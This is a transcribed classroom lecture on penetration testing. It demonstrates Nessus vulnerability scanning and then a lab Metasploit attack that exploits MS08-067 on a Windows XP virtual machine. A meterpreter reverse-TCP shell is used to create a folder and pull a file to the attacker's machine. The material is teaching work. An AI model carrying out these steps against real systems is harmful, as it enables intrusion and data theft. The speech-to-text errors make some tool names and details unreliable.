 Now, we are going to start with the penetration testing. So, what is penetration testing? A penetration testing or the short form pentest is an attack on a computer system with the intention of finding security weaknesses, potentially getting access to it and to its functionality and data. So, basically there is one computer and your finding vulnerabilities in that computer and then attacking that computer, ok. So, there are three steps in penetration testing. First step is information gathering. For this step, there are many tools that are available such as Nmap, who is a host command. These basic network commands were covered on the day one in the quiz and we had showed you a small demo of Nmap, Nmap tool, how to use this Nmap tool, so what is an Nmap tool? Nmap tool is used to discover live host in the network and then perform a port scan on those networks, on those hosts, right. So, once you have this information that, ok, this host is alive in my network, so what are the vulnerabilities that exist in that host? For this purpose, this is the second step, finding the vulnerabilities in the host. For this step, there are many tools that are available, Nessus, NxPost, NxPost is similar to the Nessus that finds the vulnerability in the target host. So, I have shown you a small demo of Nessus, I am going to repeat that again. So, using Nessus, you are going to scan a target host and then find vulnerabilities in that host. So, this is the Nessus application, Nessus tool, here you have to enter your S&M password login. So, this Nessus is an open source software, open source vulnerability scanner tool. It is used for finding the vulnerabilities in web application as well as in a system It is also used for finding the malware in the window system. So, the flow in the Nessus is, as I said yesterday, you have to first create a policy and then use this policy to perform a scan. So, for creating a policy, you have to go into the policy tab, click on the new policy and then it will list a number of options for creating the policies. So, as you can see, there is a host discovery policy, basic networks and web application. Host discovery does the same thing as NMAP does. It can, it discovers the live host in your network and does the port scan on the host. Basic networks can, this policy is used to find the vulnerabilities on the target system. Okay, so if there is a system that is alive in the network, I will use this scan and find the vulnerabilities that exist in that system. So, in order to create a policy, you have to just select this policy, basic networks in, give the policy name, visibility, private or shared, next. Then you have to select the scan type, internal or external. So, depending on the scan type that you are selecting, a specific set of plugins are acted. So, what is plugin? Plugins are, plugins try to find the vulnerabilities in the target host or the target web application. And then, select the scan type, next. And this is an option step where you can provide the username and password of the system that you are going to scan. And then click on the save button and the policy will be created. I have created this policy already, so I am not going to do that again. So, this is the internal network scan that the policy had created already. And now, once this policy is created, I am going to use this policy and perform a scan on the target system. So now, this policy is created. And now, to launch the scan, go to the scans tab, click on new scan. And here, you have to give the name of the scan, say scan 1. Here, you have to select the policy from the list of, it will display a list of policies and you have to select one of them. So, as you can see, these are all the policies that I had created. And I will select this internal network scan. Then, specify the target on which you have to perform this scan. So, for this, you have to specify the IP address of that target system. So, it will be something like 192.168.21.34. So, this is the IP address of that target system. You can even specify a range of IP addresses. It will scan all the IP address, it will scan all the host that comes in that IP address. And then, click on launch. And as you can see, there is this scan is created and the scan takes quite a long time. Since here, there is no internet connection, it is completed within few seconds. So, similar scan I had done previously. I did this vulnerability scan on the host which had this IP address. And when the scan was complete, it showed me this type of, this all vulnerabilities. It says that there are five critical vulnerabilities, one high-level vulnerability, one medium level. So, this, by criticality, it means that to how much extent it can harm your computer if this vulnerability is exploited. So, in order to get more information about the vulnerabilities, click here and you will get a list of all the vulnerabilities that exist in the target system. Here it also says, gives information about the OS that is working on the target system. It is Microsoft Windows XP service pack 2. And here, there are several critical vulnerabilities. To get more information about this vulnerability, just click on it. Suppose say this one, Ms08067, when you click this one, it says the remote host is vulnerable to buffer overrun in the server service that may allow an attacker to execute arbitrary code on the remote host with system privileges. So, what it means is that there is one C program in the XP server called NetAPI32.dll, and in that C program, there is a buffer role for vulnerability. And this vulnerability may be exploited by the attacker. So, note this vulnerability number, that is Ms08061, and we are going to now exploit this vulnerability. So, once we have found what all vulnerabilities exist in the target system, we will select one of them, one of the vulnerability and exploit that vulnerability using MetaSplit. Now, using MetaSplit, we are going to exploit this vulnerability, Ms08067. So, as Nikhil has explained, how we can search for vulnerability in the target host. So, you want to make a note of the vulnerability name actually. We will use that vulnerability name inside, use the vulnerability name to search which exploit should be used to exploit that vulnerability inside MetaSplit. So, I will quickly go to the demo part. Okay. So, here is a scenario. Here is a victim, an attacker. I am using a VMware Workstation. So, in my computer, I am using the VMware Workstation. And inside this Workstation, I am running two operating system with different IP. So, what happens is now there is a small network inside my computer with two systems. One is running attacker's machine, one is running victim's machine. So, what I am going to do, I am going to use the attacker's machine to exploit the victim's machine. Okay. So, as you can see, I am using the VMware Workstation and this is an attacker and this is a victim. So, victim machine is Windows XP Service Pack 2 in which he has scanned and found the vulnerability Ms08067. Okay. Or for attacker, I am using Kali Linux. Kali Linux has bundled with the MetaSplit. You can also install MetaSplit separately on Ubuntu. And also, it is already in-built inside the Kali Linux. So, first of all, I want to show that this is a Windows XP and Service Pack 2. As you can see, system name is Microsoft Windows XP Professional Service Pack 2, version 2002. I think it is visible now. Yes. So, now I will run MetaSplit inside my attacker machine. So, to run the MetaSplit, you just open the terminal and type MSF console. MSF console will prompt, it will prompt, it will open up MetaSplit framework. As you can see, I am inside MetaSplit framework. And it has preset of MetaSplit in it. There are 1246 exploit inside the MetaSplit. Okay. So, you can use one of them to attack any target system. And when you are inside MetaSplit framework, anytime you want help to see which commands are there with this MetaSplit, you just type help. It will show all the commands and all the description about those commands. So, here I will type help and press enter. As you can see, there are many, many commands. There are some core commands like CD. CD is for changing the directory, if you want to change the directory in the local system. There is an exit command, which is used to exit from the MSF console. And many more, like info. Info will give you all the information regarding a particular exploit. Okay. So, these are all the commands you can see and explore them. Now, I will move ahead. So, if you want to see what are the exploit, those 1246 exploits inside the MetaSplit, you just say show and exploits. It will list all the exploits inside the MetaSplit framework. It is quite a long list because it has 1246 exploits. So, you can see these are all the exploits. And in the first, this is a exploit name, which is highlighted, windows slash VNC, VNC, HTTP get. This is an exploit name. They have named each exploit. The date on which this exploit is explored and its rank. So, they give a rank to a particular exploit and some description about that exploit. Okay. So, suppose now, I want to search. So, as I told you, the vulnerability name was MS08067 in the nexus. Now, I want to search that vulnerability, search and exploit, which exploit that vulnerability. So, just say search and vulnerability name. As you can see, search is visible, right? So, search MS08067. Now, it will show the exploit, which is used to exploit this vulnerability. So, as you can see, the name of the exploit is exploit slash windows slash SMB slash MS08067 underscore NATAPI. NATAPI is a C program, which Nikhil has told, which has buffer over vulnerability. And same is disclosure date, rank and some description about it. Now, I want the full information about this exploit. So, there is a command called info. Info will give you all the information regarding a particular exploit. So, if I type. So, first of all, I am using this exploit. Okay. So, to use this particular exploit, just type use and the name of the exploit. So, I will just copy that, the name of the exploit and paste here. So, use, when I hit enter, I am inside that exploit. As you can see, MSF exploit and bracket, in bracket, there are MSF, MS08, 067 NATAPI. I am inside the exploit module now. Now, I want to know the more information about this exploit, what this exploit has. So, I will just say info and hit enter. As you can see, there are many, many description about this. So, there are first name of the exploit, then module name, then platform on which it will work, the rank and etc. Who created it and available targets. Available targets are on which these exploits are there. Suppose, in my victim machine, the exploit version target is windows XP to XP, SP to English. So, as you can see, it is listed here. Windows XP, SP to English. So, this means this exploit will work on this particular target. There are several other version of windows XP on which it can work. Here, you can see a small description part of this particular exploit. You can read about it and know more about the exploit and references also if you want more to know. Okay, now I want to know. So, there are, for this exploit, there are certain payloads. So, payloads are the actual code which will be executed inside the target machine. So, there are many payloads inside this exploit. So, you want to use one of them. So, if you want to know what are all those payloads, you should say show payloads. Just don't worry about the commands. We will be providing you these commands and these videos in your resources as a resource. So, just see the steps. What are the steps? Show payload. It will list all the payloads. So, these are all the payloads for this particular exploit. This is a description about the payload. And I will be using the particular one exploit which will open a command prompt of the target machine inside the attackers machine. Okay, so that payload is windowsmitrepreter-reverse-tcp. So, suppose I want to use this payload. So, just set, say set for payload, we use set for exploit we use use. So, say set and the payload name, payload and the payload name. I have copied that payload name and just I will paste here. So, I have just pasted here windowsmitrepreter-reverse-tcp. As you can see the payload is set to windowsmitrepreter-reverse-tcp. Okay. Now, we will move ahead. Now, for a certain payload to execute on the target machine, this payload needs some information. Some information like IP address of the target machine, which port it should be there, it should be listening. Okay. So, just you want to know what information it requires. So, just say show options. It will list all the variables you need to specify for this payload to execute. So, here you can see you need to specify the R host. R host is the IP address of the remote host, the target host on which this payload should be executed. And the port is already set. R port is already set as you can see to 445. So, we know that that net api32.dll is running on this port. So, we will not change that. Okay. So, now I want to open a command shell, command prompt of the target machine inside the attackers machine. So, there should be a back connection from the target machine to attackers machine. So, for that I need to provide my IP address also, the attackers IP address also. So, in the L host, you will provide the IP address of the attacker. Okay. And some L port. L port could be anything like 4444. I am using 4444. You can change it to anything. So, I will say set R host. R host is the target IP address. So, that IP address I know 192.168.12.129. That is the IP address of the target host. So, here we have set as you can see R host is set to the IP address. Now, I will set the L host which is the IP address of my machine. I know IP address of my machine. So, which is 12.128. So, you can see that there are two different IP addresses. One is 128 and one is 129. 129 is for target machine and 128 is for attackers machine. Okay. Now, if I again type the show options. So, these variables should be set there. As you can see the R host is set to 129 IP address and L host is set to 128 IP address. Okay. Now, easy part, most easy part just type exploit. This payload will go to the attackers machine execute there. Exploit and hit enter. As you can see a command prompt has appeared which is called meterpreter. So, meterpreter is like command prompt but it has less privileges than command prompt. Okay. So, in meterpreter you can type a command called shell which will actually open the command prompt of the target machine. So, yeah, there are many commands for meterpreter one of this shell. If you want to know all the commands which it can execute just type help again like I showed you before. Type help it showed all the commands here which it can use. You can learn about those. So, there are commands like CD download if you want to download some particular file from the remote host to our host to attackers host then you can use these commands. Okay. They are upload command is make directory command and so on. Okay. So, I want to open the command prompt now from in the attackers machine. So, I will type shell. Shell is a command from that and hit enter. As you can see the C colon slash windows system 32. This is a command prompt of the windows system which is XP. Now actually see this is happening to see this is happening. We will go to the victim machine and see what are the files inside his C directory. So, I am running this command prompt there in the windows system the victims machine and see what are the directories there in the C directory. I am inside C now and type dir which will list all the directories inside the C. You can see they are you can count it. So, they are auto EXE config document documents and citing program files and secret underscore info dot txt text dir and windows. Okay. So, there are 1 2 3 4 5 6 7. Okay. 7 and 7 documents are there. Now, I will see these same directories inside my attackers machine. I will just go to the C and type dir again in the attackers machine now. As you can see all the same directories are inside my attackers domain. Okay. Now, suppose I want to create a directory inside the victims machine. What was the command for that? I showed you MK dir. So, just type MK dir and some folder name like hacked and hit enter. Now, if I go to the victim machine and see the dir again, you can see there is no folder here named hacked. Now, again I will type dir hit enter. You can see folder has been created directly hacked. Okay. So, I have the heart of the victims machine now. I can't do anything. I can download anything. I can upload anything. I can execute anything. Okay. So, similarly I have shown another example to download which you can later see because this is just a command download and the file name. So, suppose I want to download this secret underscore info dot txt. So, I know the name now because from the dir I know there is a direct there is for file now file called secret underscore info dot txt. Now, in the attackers machine I can download it. So, that download command was for meter operator not for the command prompt. So, I will if I want to go outside from the command prompt I will type exit. I mean now I am inside the meter operator before. Now, I type download which is a command for meter operator and the file name of the victims machine which is C. In C there is a file called secret underscore info dot txt. This is a source path and now I will type the destination path. Destination path is my home directory of the attackers machine. Hit the enter. Now, file is being down has been downloaded from the victims machine to the target machine to the attackers machine. Now, if I want to see that file just go outside the MSF console. I am outside the MSF console. Now, I am moving to my home directory which where I have downloaded this file and CLS as you can see secret underscore info dot txt is there. So, this was all about MetaSprite. So, how you can use vulnerabilities in MetaSprite to exploit a target. I am done with my demo. Thank you.